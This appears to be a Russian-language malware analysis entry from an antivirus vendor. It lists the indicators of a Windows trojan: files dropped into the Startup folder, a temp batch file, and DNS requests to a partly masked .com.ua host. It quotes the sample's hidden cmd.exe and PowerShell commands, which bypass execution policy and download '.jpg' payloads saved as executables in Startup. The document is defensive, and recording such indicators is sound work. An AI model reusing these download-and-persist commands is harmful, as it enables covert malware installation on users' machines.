Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\sink asynchronous.exe
- http://pa####z.zzz.com.ua/sink_asynchronous.jpg как %appdata%\microsoft\windows\start menu\programs\startup\sink asynchronous.exe
- http://pa####z.zzz.com.ua/usermode_font.jpg как %appdata%\microsoft\windows\start menu\programs\startup\usermode font.exe
- %TEMP%\5759.tmp\system_audio_rhts 3333333.bat
- %TEMP%\5759.tmp\system_audio_rhts 3333333.bat
- http://pa####z.zzz.com.ua/Sink_asynchronous.jpg
- http://pa####z.zzz.com.ua/Usermode_Font.jpg
- DNS ASK pa####z.zzz.com.ua
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\5759.tmp\System_Audio_RHTS 3333333.bat" "<Полный путь к файлу>""' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\5759.tmp\System_Audio_RHTS 3333333.bat" "<Полный путь к файлу>""
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://pa####z.zzz.com.ua/Sink_asynchronous.jpg','%APPDATA%\Microsoft\Wi...
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://pa####z.zzz.com.ua/Usermode_Font.jpg','%APPDATA%\Microsoft\Window...